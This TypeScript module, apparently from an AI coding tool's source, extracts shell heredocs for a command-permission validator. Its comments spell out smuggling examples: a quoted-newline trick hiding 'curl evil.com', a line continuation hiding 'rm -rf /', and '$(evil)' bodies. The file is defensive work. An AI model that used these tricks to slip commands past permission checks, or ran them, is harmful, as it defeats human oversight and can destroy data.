source dump of claude code
at main 733 lines 32 kB view raw
1/** 2 * Heredoc extraction and restoration utilities. 3 * 4 * The shell-quote library parses `<<` as two separate `<` redirect operators, 5 * which breaks command splitting for heredoc syntax. This module provides 6 * utilities to extract heredocs before parsing and restore them after. 7 * 8 * Supported heredoc variations: 9 * - <<WORD - basic heredoc 10 * - <<'WORD' - single-quoted delimiter (no variable expansion in content) 11 * - <<"WORD" - double-quoted delimiter (with variable expansion) 12 * - <<-WORD - dash prefix (strips leading tabs from content) 13 * - <<-'WORD' - combined dash and quoted delimiter 14 * 15 * Known limitations: 16 * - Heredocs inside backtick command substitution may not be extracted 17 * - Very complex multi-heredoc scenarios may not be extracted 18 * 19 * When extraction fails, the command passes through unchanged. This is safe 20 * because the unextracted heredoc will either cause shell-quote parsing to fail 21 * (falling back to treating the whole command as one unit) or require manual 22 * approval for each apparent subcommand. 23 * 24 * @module 25 */ 26 27import { randomBytes } from 'crypto' 28 29const HEREDOC_PLACEHOLDER_PREFIX = '__HEREDOC_' 30const HEREDOC_PLACEHOLDER_SUFFIX = '__' 31 32/** 33 * Generates a random hex string for placeholder uniqueness. 34 * This prevents collision when command text literally contains "__HEREDOC_N__". 35 */ 36function generatePlaceholderSalt(): string { 37 // Generate 8 random bytes as hex (16 characters) 38 return randomBytes(8).toString('hex') 39} 40 41/** 42 * Regex pattern for matching heredoc start syntax. 43 * 44 * Two alternatives handle quoted vs unquoted delimiters differently: 45 * 46 * Alternative 1 (quoted): (['"]) (\\?\w+) \2 47 * Captures the opening quote, then the delimiter word (which MAY include a 48 * leading backslash since it's literal inside quotes), then the closing quote. 49 * In bash, single quotes make EVERYTHING literal including backslashes: 50 * <<'\EOF' → delimiter is \EOF (with backslash) 51 * <<'EOF' → delimiter is EOF 52 * Double quotes also preserve backslashes before non-special chars: 53 * <<"\EOF" → delimiter is \EOF 54 * 55 * Alternative 2 (unquoted): \\?(\w+) 56 * Optionally consumes a leading backslash (escape), then captures the word. 57 * In bash, an unquoted backslash escapes the next character: 58 * <<\EOF → delimiter is EOF (backslash consumed as escape) 59 * <<EOF → delimiter is EOF (plain) 60 * 61 * SECURITY: The backslash MUST be inside the capture group for quoted 62 * delimiters but OUTSIDE for unquoted ones. The old regex had \\? outside 63 * the capture group unconditionally, causing <<'\EOF' to extract delimiter 64 * "EOF" while bash uses "\EOF", allowing command smuggling. 65 * 66 * Note: Uses [ \t]* (not \s*) to avoid matching across newlines, which would be 67 * a security issue (could hide commands between << and the delimiter). 68 */ 69const HEREDOC_START_PATTERN = 70 // eslint-disable-next-line custom-rules/no-lookbehind-regex -- gated by command.includes('<<') at extractHeredocs() entry 71 /(?<!<)<<(?!<)(-)?[ \t]*(?:(['"])(\\?\w+)\2|\\?(\w+))/ 72 73export type HeredocInfo = { 74 /** The full heredoc text including << operator, delimiter, content, and closing delimiter */ 75 fullText: string 76 /** The delimiter word (without quotes) */ 77 delimiter: string 78 /** Start position of the << operator in the original command */ 79 operatorStartIndex: number 80 /** End position of the << operator (exclusive) - content on same line after this is preserved */ 81 operatorEndIndex: number 82 /** Start position of heredoc content (the newline before content) */ 83 contentStartIndex: number 84 /** End position of heredoc content including closing delimiter (exclusive) */ 85 contentEndIndex: number 86} 87 88export type HeredocExtractionResult = { 89 /** The command with heredocs replaced by placeholders */ 90 processedCommand: string 91 /** Map of placeholder string to original heredoc info */ 92 heredocs: Map<string, HeredocInfo> 93} 94 95/** 96 * Extracts heredocs from a command string and replaces them with placeholders. 97 * 98 * This allows shell-quote to parse the command without mangling heredoc syntax. 99 * After parsing, use `restoreHeredocs` to replace placeholders with original content. 100 * 101 * @param command - The shell command string potentially containing heredocs 102 * @returns Object containing the processed command and a map of placeholders to heredoc info 103 * 104 * @example 105 * ```ts 106 * const result = extractHeredocs(`cat <<EOF 107 * hello world 108 * EOF`); 109 * // result.processedCommand === "cat __HEREDOC_0_a1b2c3d4__" (salt varies) 110 * // result.heredocs has the mapping to restore later 111 * ``` 112 */ 113export function extractHeredocs( 114 command: string, 115 options?: { quotedOnly?: boolean }, 116): HeredocExtractionResult { 117 const heredocs = new Map<string, HeredocInfo>() 118 119 // Quick check: if no << present, skip processing 120 if (!command.includes('<<')) { 121 return { processedCommand: command, heredocs } 122 } 123 124 // Security: Paranoid pre-validation. Our incremental quote/comment scanner 125 // (see advanceScan below) does simplified parsing that cannot handle all 126 // bash quoting constructs. If the command contains 127 // constructs that could desync our quote tracking, bail out entirely 128 // rather than risk extracting a heredoc with incorrect boundaries. 129 // This is defense-in-depth: each construct below has caused or could 130 // cause a security bypass if we attempt extraction. 131 // 132 // Specifically, we bail if the command contains: 133 // 1. $'...' or $"..." (ANSI-C / locale quoting — our quote tracker 134 // doesn't handle the $ prefix, would misparse the quotes) 135 // 2. Backtick command substitution (backtick nesting has complex parsing 136 // rules, and backtick acts as shell_eof_token for PST_EOFTOKEN in 137 // make_cmd.c:606, enabling early heredoc closure that our parser 138 // can't replicate) 139 if (/\$['"]/.test(command)) { 140 return { processedCommand: command, heredocs } 141 } 142 // Check for backticks in the command text before the first <<. 143 // Backtick nesting has complex parsing rules, and backtick acts as 144 // shell_eof_token for PST_EOFTOKEN (make_cmd.c:606), enabling early 145 // heredoc closure that our parser can't replicate. We only check 146 // before << because backticks in heredoc body content are harmless. 147 const firstHeredocPos = command.indexOf('<<') 148 if (firstHeredocPos > 0 && command.slice(0, firstHeredocPos).includes('`')) { 149 return { processedCommand: command, heredocs } 150 } 151 152 // Security: Check for arithmetic evaluation context before the first `<<`. 153 // In bash, `(( x = 1 << 2 ))` uses `<<` as a BIT-SHIFT operator, not a 154 // heredoc. If we mis-extract it, subsequent lines become "heredoc content" 155 // and are hidden from security validators, while bash executes them as 156 // separate commands. We bail entirely if `((` appears before `<<` without 157 // a matching `))` — we can't reliably distinguish arithmetic `<<` from 158 // heredoc `<<` in that context. Note: $(( is already caught by 159 // validateDangerousPatterns, but bare (( is not. 160 if (firstHeredocPos > 0) { 161 const beforeHeredoc = command.slice(0, firstHeredocPos) 162 // Count (( and )) occurrences — if unbalanced, `<<` may be arithmetic 163 const openArith = (beforeHeredoc.match(/\(\(/g) || []).length 164 const closeArith = (beforeHeredoc.match(/\)\)/g) || []).length 165 if (openArith > closeArith) { 166 return { processedCommand: command, heredocs } 167 } 168 } 169 170 // Create a global version of the pattern for iteration 171 const heredocStartPattern = new RegExp(HEREDOC_START_PATTERN.source, 'g') 172 173 const heredocMatches: HeredocInfo[] = [] 174 // Security: When quotedOnly skips an unquoted heredoc, we still need to 175 // track its content range so the nesting filter can reject quoted heredocs 176 // that appear INSIDE the skipped unquoted heredoc's body. Without this, 177 // `cat <<EOF\n<<'SAFE'\n$(evil)\nSAFE\nEOF` would extract <<'SAFE' as a 178 // top-level heredoc, hiding $(evil) from validators — even though in bash, 179 // $(evil) IS executed (unquoted <<EOF expands its body). 180 const skippedHeredocRanges: Array<{ 181 contentStartIndex: number 182 contentEndIndex: number 183 }> = [] 184 let match: RegExpExecArray | null 185 186 // Incremental quote/comment scanner state. 187 // 188 // The regex walks forward through the command, and match.index is monotonically 189 // increasing. Previously, isInsideQuotedString and isInsideComment each 190 // re-scanned from position 0 on every match — O(n²) when the heredoc body 191 // contains many `<<` (e.g. C++ with `std::cout << ...`). A 200-line C++ 192 // heredoc hit ~3.7ms per extractHeredocs call, and Bash security validation 193 // calls extractHeredocs multiple times per command. 194 // 195 // Instead, track quote/comment/escape state incrementally and advance from 196 // the last scanned position. This preserves the OLD helpers' exact semantics: 197 // 198 // Quote state (was isInsideQuotedString) is COMMENT-BLIND — it never sees 199 // `#` and never skips characters for being "in a comment". Inside single 200 // quotes, everything is literal. Inside double quotes, backslash escapes 201 // the next char. An unquoted backslash run of odd length escapes the next 202 // char. 203 // 204 // Comment state (was isInsideComment) observes quote state (# inside quotes 205 // is not a comment) but NOT the reverse. The old helper used a per-call 206 // `lineStart = lastIndexOf('\n', pos-1)+1` bound on which `#` to consider; 207 // equivalently, any physical `\n` clears comment state — including `\n` 208 // inside quotes (since lastIndexOf was quote-blind). 209 // 210 // SECURITY: Do NOT let comment mode suppress quote-state updates. If `#` put 211 // the scanner in a mode that skipped quote chars, then `echo x#"\n<<...` 212 // (where bash treats `#` as part of the word `x#`, NOT a comment) would 213 // report the `<<` as unquoted and EXTRACT it — hiding content from security 214 // validators. The old isInsideQuotedString was comment-blind; we preserve 215 // that. Both old and new over-eagerly treat any unquoted `#` as a comment 216 // (bash requires word-start), but since quote tracking is independent, the 217 // over-eagerness only affects the comment check — causing SKIPS (safe 218 // direction), never extra EXTRACTIONS. 219 let scanPos = 0 220 let scanInSingleQuote = false 221 let scanInDoubleQuote = false 222 let scanInComment = false 223 // Inside "...": true if the previous char was a backslash (next char is escaped). 224 // Carried across advanceScan calls so a `\` at scanPos-1 correctly escapes 225 // the char at scanPos. 226 let scanDqEscapeNext = false 227 // Unquoted context: length of the consecutive backslash run ending at scanPos-1. 228 // Used to determine if the char at scanPos is escaped (odd run = escaped). 229 let scanPendingBackslashes = 0 230 231 const advanceScan = (target: number): void => { 232 for (let i = scanPos; i < target; i++) { 233 const ch = command[i]! 234 235 // Any physical newline clears comment state. The old isInsideComment 236 // used `lineStart = lastIndexOf('\n', pos-1)+1` (quote-blind), so a 237 // `\n` inside quotes still advanced lineStart. Match that here by 238 // clearing BEFORE the quote branches. 239 if (ch === '\n') scanInComment = false 240 241 if (scanInSingleQuote) { 242 if (ch === "'") scanInSingleQuote = false 243 continue 244 } 245 246 if (scanInDoubleQuote) { 247 if (scanDqEscapeNext) { 248 scanDqEscapeNext = false 249 continue 250 } 251 if (ch === '\\') { 252 scanDqEscapeNext = true 253 continue 254 } 255 if (ch === '"') scanInDoubleQuote = false 256 continue 257 } 258 259 // Unquoted context. Quote tracking is COMMENT-BLIND (same as the old 260 // isInsideQuotedString): we do NOT skip chars for being inside a 261 // comment. Only the `#` detection itself is gated on not-in-comment. 262 if (ch === '\\') { 263 scanPendingBackslashes++ 264 continue 265 } 266 const escaped = scanPendingBackslashes % 2 === 1 267 scanPendingBackslashes = 0 268 if (escaped) continue 269 270 if (ch === "'") scanInSingleQuote = true 271 else if (ch === '"') scanInDoubleQuote = true 272 else if (!scanInComment && ch === '#') scanInComment = true 273 } 274 scanPos = target 275 } 276 277 while ((match = heredocStartPattern.exec(command)) !== null) { 278 const startIndex = match.index 279 280 // Advance the incremental scanner to this match's position. After this, 281 // scanInSingleQuote/scanInDoubleQuote/scanInComment reflect the parser 282 // state immediately BEFORE startIndex, and scanPendingBackslashes is the 283 // count of unquoted `\` immediately preceding startIndex. 284 advanceScan(startIndex) 285 286 // Skip if this << is inside a quoted string (not a real heredoc operator). 287 if (scanInSingleQuote || scanInDoubleQuote) { 288 continue 289 } 290 291 // Security: Skip if this << is inside a comment (after unquoted #). 292 // In bash, `# <<EOF` is a comment — extracting it would hide commands on 293 // subsequent lines as "heredoc content" while bash executes them. 294 if (scanInComment) { 295 continue 296 } 297 298 // Security: Skip if this << is preceded by an odd number of backslashes. 299 // In bash, `\<<EOF` is NOT a heredoc — `\<` is a literal `<`, then `<EOF` 300 // is input redirection. Extracting it would drop same-line commands from 301 // security checks. The scanner tracks the unquoted backslash run ending 302 // immediately before startIndex (scanPendingBackslashes). 303 if (scanPendingBackslashes % 2 === 1) { 304 continue 305 } 306 307 // Security: Bail if this `<<` falls inside the body of a previously 308 // SKIPPED heredoc (unquoted heredoc in quotedOnly mode). In bash, 309 // `<<` inside a heredoc body is just text — it's not a nested heredoc 310 // operator. Extracting it would hide content that bash actually expands. 311 let insideSkipped = false 312 for (const skipped of skippedHeredocRanges) { 313 if ( 314 startIndex > skipped.contentStartIndex && 315 startIndex < skipped.contentEndIndex 316 ) { 317 insideSkipped = true 318 break 319 } 320 } 321 if (insideSkipped) { 322 continue 323 } 324 325 const fullMatch = match[0] 326 const isDash = match[1] === '-' 327 // Group 3 = quoted delimiter (may include backslash), group 4 = unquoted 328 const delimiter = (match[3] || match[4])! 329 const operatorEndIndex = startIndex + fullMatch.length 330 331 // Security: Two checks to verify our regex captured the full delimiter word. 332 // Any mismatch between our parsed delimiter and bash's actual delimiter 333 // could allow command smuggling past permission checks. 334 335 // Check 1: If a quote was captured (group 2), verify the closing quote 336 // was actually matched by \2 in the regex (the quoted alternative requires 337 // the closing quote). The regex's \w+ only matches [a-zA-Z0-9_], so 338 // non-word chars inside quotes (spaces, hyphens, dots) cause \w+ to stop 339 // early, leaving the closing quote unmatched. 340 // Example: <<"EO F" — regex captures "EO", misses closing ", delimiter 341 // should be "EO F" but we'd use "EO". Skip to prevent mismatch. 342 const quoteChar = match[2] 343 if (quoteChar && command[operatorEndIndex - 1] !== quoteChar) { 344 continue 345 } 346 347 // Security: Determine if the delimiter is quoted ('EOF', "EOF") or 348 // escaped (\EOF). In bash, quoted/escaped delimiters suppress all 349 // expansion in the heredoc body — content is literal text. Unquoted 350 // delimiters (<<EOF) perform full shell expansion: $(), backticks, 351 // and ${} in the body ARE executed. When quotedOnly is set, skip 352 // unquoted heredocs so their bodies remain visible to security 353 // validators (they may contain executable command substitutions). 354 const isEscapedDelimiter = fullMatch.includes('\\') 355 const isQuotedOrEscaped = !!quoteChar || isEscapedDelimiter 356 // Note: We do NOT skip unquoted heredocs here anymore when quotedOnly is 357 // set. Instead, we compute their content range and add them to 358 // skippedHeredocRanges, then skip them AFTER finding the closing 359 // delimiter. This lets the nesting filter correctly reject quoted 360 // "heredocs" that appear inside unquoted heredoc bodies. 361 362 // Check 2: Verify the next character after our match is a bash word 363 // terminator (metacharacter or end of string). Characters like word chars, 364 // quotes, $, \ mean the bash word extends beyond our match 365 // (e.g., <<'EOF'a where bash uses "EOFa" but we captured "EOF"). 366 // IMPORTANT: Only match bash's actual metacharacters — space (0x20), 367 // tab (0x09), newline (0x0A), |, &, ;, (, ), <, >. Do NOT use \s which 368 // also matches \r, \f, \v, and Unicode whitespace that bash treats as 369 // regular word characters, not terminators. 370 if (operatorEndIndex < command.length) { 371 const nextChar = command[operatorEndIndex]! 372 if (!/^[ \t\n|&;()<>]$/.test(nextChar)) { 373 continue 374 } 375 } 376 377 // In bash, heredoc content starts on the NEXT LINE after the operator. 378 // Any content on the same line after <<EOF (like " && echo done") is part 379 // of the command, not the heredoc content. 380 // 381 // SECURITY: The "same line" must be the LOGICAL command line, not the 382 // first physical newline. Multi-line quoted strings extend the logical 383 // line — bash waits for the quote to close before starting to read the 384 // heredoc body. A quote-blind `indexOf('\n')` finds newlines INSIDE 385 // quoted strings, causing the body to start too early. 386 // 387 // Exploit: `echo <<'EOF' '${}\n' ; curl evil.com\nEOF` 388 // - The `\n` inside `'${}\n'` is quoted (literal newline in a string arg) 389 // - Bash: waits for `'` to close → logical line is 390 // `echo <<'EOF' '${}\n' ; curl evil.com` → heredoc body = `EOF` 391 // - Our old code: indexOf('\n') finds the quoted newline → body starts 392 // at `' ; curl evil.com\nEOF` → curl swallowed into placeholder → 393 // NEVER reaches permission checks. 394 // 395 // Fix: scan forward from operatorEndIndex using quote-state tracking, 396 // finding the first newline that's NOT inside a quoted string. Same 397 // quote-tracking semantics as advanceScan (already used to validate 398 // the `<<` operator position above). 399 let firstNewlineOffset = -1 400 { 401 let inSingleQuote = false 402 let inDoubleQuote = false 403 // We start with clean quote state — advanceScan already rejected the 404 // case where the `<<` operator itself is inside a quote. 405 for (let k = operatorEndIndex; k < command.length; k++) { 406 const ch = command[k] 407 if (inSingleQuote) { 408 if (ch === "'") inSingleQuote = false 409 continue 410 } 411 if (inDoubleQuote) { 412 if (ch === '\\') { 413 k++ // skip escaped char inside double quotes 414 continue 415 } 416 if (ch === '"') inDoubleQuote = false 417 continue 418 } 419 // Unquoted context 420 if (ch === '\n') { 421 firstNewlineOffset = k - operatorEndIndex 422 break 423 } 424 // Count backslashes for escape detection in unquoted context 425 let backslashCount = 0 426 for (let j = k - 1; j >= operatorEndIndex && command[j] === '\\'; j--) { 427 backslashCount++ 428 } 429 if (backslashCount % 2 === 1) continue // escaped char 430 if (ch === "'") inSingleQuote = true 431 else if (ch === '"') inDoubleQuote = true 432 } 433 // If we ended while still inside a quote, the logical line never ends — 434 // there is no heredoc body. Leave firstNewlineOffset as -1 (handled below). 435 } 436 437 // If no unquoted newline found, this heredoc has no content - skip it 438 if (firstNewlineOffset === -1) { 439 continue 440 } 441 442 // Security: Check for backslash-newline continuation at the end of the 443 // same-line content (text between the operator and the newline). In bash, 444 // `\<newline>` joins lines BEFORE heredoc parsing — so: 445 // cat <<'EOF' && \ 446 // rm -rf / 447 // content 448 // EOF 449 // bash joins to `cat <<'EOF' && rm -rf /` (rm is part of the command line), 450 // then heredoc body = `content`. Our extractor runs BEFORE continuation 451 // joining (commands.ts:82), so it would put `rm -rf /` in the heredoc body, 452 // hiding it from all validators. Bail if same-line content ends with an 453 // odd number of backslashes. 454 const sameLineContent = command.slice( 455 operatorEndIndex, 456 operatorEndIndex + firstNewlineOffset, 457 ) 458 let trailingBackslashes = 0 459 for (let j = sameLineContent.length - 1; j >= 0; j--) { 460 if (sameLineContent[j] === '\\') { 461 trailingBackslashes++ 462 } else { 463 break 464 } 465 } 466 if (trailingBackslashes % 2 === 1) { 467 // Odd number of trailing backslashes → last one escapes the newline 468 // → this is a line continuation. Our heredoc-before-continuation order 469 // would misparse this. Bail out. 470 continue 471 } 472 473 const contentStartIndex = operatorEndIndex + firstNewlineOffset 474 const afterNewline = command.slice(contentStartIndex + 1) // +1 to skip the newline itself 475 const contentLines = afterNewline.split('\n') 476 477 // Find the closing delimiter - must be on its own line 478 // Security: Must match bash's exact behavior to prevent parsing discrepancies 479 // that could allow command smuggling past permission checks. 480 let closingLineIndex = -1 481 for (let i = 0; i < contentLines.length; i++) { 482 const line = contentLines[i]! 483 484 if (isDash) { 485 // <<- strips leading TABS only (not spaces), per POSIX/bash spec. 486 // The line after stripping leading tabs must be exactly the delimiter. 487 const stripped = line.replace(/^\t*/, '') 488 if (stripped === delimiter) { 489 closingLineIndex = i 490 break 491 } 492 } else { 493 // << requires the closing delimiter to be exactly alone on the line 494 // with NO leading or trailing whitespace. This matches bash behavior. 495 if (line === delimiter) { 496 closingLineIndex = i 497 break 498 } 499 } 500 501 // Security: Check for PST_EOFTOKEN-like early closure (make_cmd.c:606). 502 // Inside $(), ${}, or backtick substitution, bash closes a heredoc when 503 // a line STARTS with the delimiter and contains the shell_eof_token 504 // (`)`, `}`, or backtick) anywhere after it. Our parser only does exact 505 // line matching, so this discrepancy could hide smuggled commands. 506 // 507 // Paranoid extension: also bail on bash metacharacters (|, &, ;, (, <, 508 // >) after the delimiter, which could indicate command syntax from a 509 // parsing discrepancy we haven't identified. 510 // 511 // For <<- heredocs, bash strips leading tabs before this check. 512 const eofCheckLine = isDash ? line.replace(/^\t*/, '') : line 513 if ( 514 eofCheckLine.length > delimiter.length && 515 eofCheckLine.startsWith(delimiter) 516 ) { 517 const charAfterDelimiter = eofCheckLine[delimiter.length]! 518 if (/^[)}`|&;(<>]$/.test(charAfterDelimiter)) { 519 // Shell metacharacter or substitution closer after delimiter — 520 // bash may close the heredoc early here. Bail out. 521 closingLineIndex = -1 522 break 523 } 524 } 525 } 526 527 // Security: If quotedOnly mode is set and this is an unquoted heredoc, 528 // record its content range for nesting checks but do NOT add it to 529 // heredocMatches. This ensures quoted "heredocs" inside its body are 530 // correctly rejected by the insideSkipped check on subsequent iterations. 531 // 532 // CRITICAL: We do this BEFORE the closingLineIndex === -1 check. If the 533 // unquoted heredoc has no closing delimiter, bash still treats everything 534 // to end-of-input as the heredoc body (and expands $() within it). We 535 // must block extraction of any subsequent quoted "heredoc" that falls 536 // inside that unbounded body. 537 if (options?.quotedOnly && !isQuotedOrEscaped) { 538 let skipContentEndIndex: number 539 if (closingLineIndex === -1) { 540 // No closing delimiter — in bash, heredoc body extends to end of 541 // input. Track the entire remaining range as "skipped body". 542 skipContentEndIndex = command.length 543 } else { 544 const skipLinesUpToClosing = contentLines.slice(0, closingLineIndex + 1) 545 const skipContentLength = skipLinesUpToClosing.join('\n').length 546 skipContentEndIndex = contentStartIndex + 1 + skipContentLength 547 } 548 skippedHeredocRanges.push({ 549 contentStartIndex, 550 contentEndIndex: skipContentEndIndex, 551 }) 552 continue 553 } 554 555 // If no closing delimiter found, this is malformed - skip it 556 if (closingLineIndex === -1) { 557 continue 558 } 559 560 // Calculate end position: contentStartIndex + 1 (newline) + length of lines up to and including closing delimiter 561 const linesUpToClosing = contentLines.slice(0, closingLineIndex + 1) 562 const contentLength = linesUpToClosing.join('\n').length 563 const contentEndIndex = contentStartIndex + 1 + contentLength 564 565 // Security: Bail if this heredoc's content range OVERLAPS with any 566 // previously-skipped heredoc's content range. This catches the case where 567 // two heredocs share a command line (`cat <<EOF <<'SAFE'`) and the first 568 // is unquoted (skipped in quotedOnly mode). In bash, when multiple heredocs 569 // share a line, their bodies appear SEQUENTIALLY (first's body, then 570 // second's). Both compute contentStartIndex from the SAME newline, so the 571 // second's body search walks through the first's body. For: 572 // cat <<EOF <<'SAFE' 573 // $(evil_command) 574 // EOF 575 // safe body 576 // SAFE 577 // ...the quoted <<'SAFE' would incorrectly extract lines 2-4 as its body, 578 // swallowing `$(evil_command)` (which bash EXECUTES via the unquoted 579 // <<EOF's expansion) into the placeholder, hiding it from validators. 580 // 581 // The insideSkipped check above doesn't catch this because the quoted 582 // operator's startIndex is on the command line BEFORE contentStart. 583 // The contentStartPositions dedup check below doesn't catch it because the 584 // skipped heredoc is in skippedHeredocRanges, not topLevelHeredocs. 585 let overlapsSkipped = false 586 for (const skipped of skippedHeredocRanges) { 587 // Ranges [a,b) and [c,d) overlap iff a < d && c < b 588 if ( 589 contentStartIndex < skipped.contentEndIndex && 590 skipped.contentStartIndex < contentEndIndex 591 ) { 592 overlapsSkipped = true 593 break 594 } 595 } 596 if (overlapsSkipped) { 597 continue 598 } 599 600 // Build fullText: operator + newline + content (normalized form for restoration) 601 // This creates a clean heredoc that can be restored correctly 602 const operatorText = command.slice(startIndex, operatorEndIndex) 603 const contentText = command.slice(contentStartIndex, contentEndIndex) 604 const fullText = operatorText + contentText 605 606 heredocMatches.push({ 607 fullText, 608 delimiter, 609 operatorStartIndex: startIndex, 610 operatorEndIndex, 611 contentStartIndex, 612 contentEndIndex, 613 }) 614 } 615 616 // If no valid heredocs found, return original 617 if (heredocMatches.length === 0) { 618 return { processedCommand: command, heredocs } 619 } 620 621 // Filter out nested heredocs - any heredoc whose operator starts inside 622 // another heredoc's content range should be excluded. 623 // This prevents corruption when heredoc content contains << patterns. 624 const topLevelHeredocs = heredocMatches.filter((candidate, _i, all) => { 625 // Check if this candidate's operator is inside any other heredoc's content 626 for (const other of all) { 627 if (candidate === other) continue 628 // Check if candidate's operator starts within other's content range 629 if ( 630 candidate.operatorStartIndex > other.contentStartIndex && 631 candidate.operatorStartIndex < other.contentEndIndex 632 ) { 633 // This heredoc is nested inside another - filter it out 634 return false 635 } 636 } 637 return true 638 }) 639 640 // If filtering removed all heredocs, return original 641 if (topLevelHeredocs.length === 0) { 642 return { processedCommand: command, heredocs } 643 } 644 645 // Check for multiple heredocs sharing the same content start position 646 // (i.e., on the same line). This causes index corruption during replacement 647 // because indices are calculated on the original string but applied to 648 // a progressively modified string. Return without extraction - the fallback 649 // is safe (requires manual approval or fails parsing). 650 const contentStartPositions = new Set( 651 topLevelHeredocs.map(h => h.contentStartIndex), 652 ) 653 if (contentStartPositions.size < topLevelHeredocs.length) { 654 return { processedCommand: command, heredocs } 655 } 656 657 // Sort by content end position descending so we can replace from end to start 658 // (this preserves indices for earlier replacements) 659 topLevelHeredocs.sort((a, b) => b.contentEndIndex - a.contentEndIndex) 660 661 // Generate a unique salt for this extraction to prevent placeholder collisions 662 // with literal "__HEREDOC_N__" text in commands 663 const salt = generatePlaceholderSalt() 664 665 let processedCommand = command 666 topLevelHeredocs.forEach((info, index) => { 667 // Use reverse index since we sorted descending 668 const placeholderIndex = topLevelHeredocs.length - 1 - index 669 const placeholder = `${HEREDOC_PLACEHOLDER_PREFIX}${placeholderIndex}_${salt}${HEREDOC_PLACEHOLDER_SUFFIX}` 670 671 heredocs.set(placeholder, info) 672 673 // Replace heredoc with placeholder while preserving same-line content: 674 // - Keep everything before the operator 675 // - Replace operator with placeholder 676 // - Keep content between operator and heredoc content (e.g., " && echo done") 677 // - Remove the heredoc content (from newline through closing delimiter) 678 // - Keep everything after the closing delimiter 679 processedCommand = 680 processedCommand.slice(0, info.operatorStartIndex) + 681 placeholder + 682 processedCommand.slice(info.operatorEndIndex, info.contentStartIndex) + 683 processedCommand.slice(info.contentEndIndex) 684 }) 685 686 return { processedCommand, heredocs } 687} 688 689/** 690 * Restores heredoc placeholders back to their original content in a single string. 691 * Internal helper used by restoreHeredocs. 692 */ 693function restoreHeredocsInString( 694 text: string, 695 heredocs: Map<string, HeredocInfo>, 696): string { 697 let result = text 698 for (const [placeholder, info] of heredocs) { 699 result = result.replaceAll(placeholder, info.fullText) 700 } 701 return result 702} 703 704/** 705 * Restores heredoc placeholders in an array of strings. 706 * 707 * @param parts - Array of strings that may contain heredoc placeholders 708 * @param heredocs - The map of placeholders from `extractHeredocs` 709 * @returns New array with placeholders replaced by original heredoc content 710 */ 711export function restoreHeredocs( 712 parts: string[], 713 heredocs: Map<string, HeredocInfo>, 714): string[] { 715 if (heredocs.size === 0) { 716 return parts 717 } 718 719 return parts.map(part => restoreHeredocsInString(part, heredocs)) 720} 721 722/** 723 * Checks if a command contains heredoc syntax. 724 * 725 * This is a quick check that doesn't validate the heredoc is well-formed, 726 * just that the pattern exists. 727 * 728 * @param command - The shell command string 729 * @returns true if the command appears to contain heredoc syntax 730 */ 731export function containsHeredoc(command: string): boolean { 732 return HEREDOC_START_PATTERN.test(command) 733}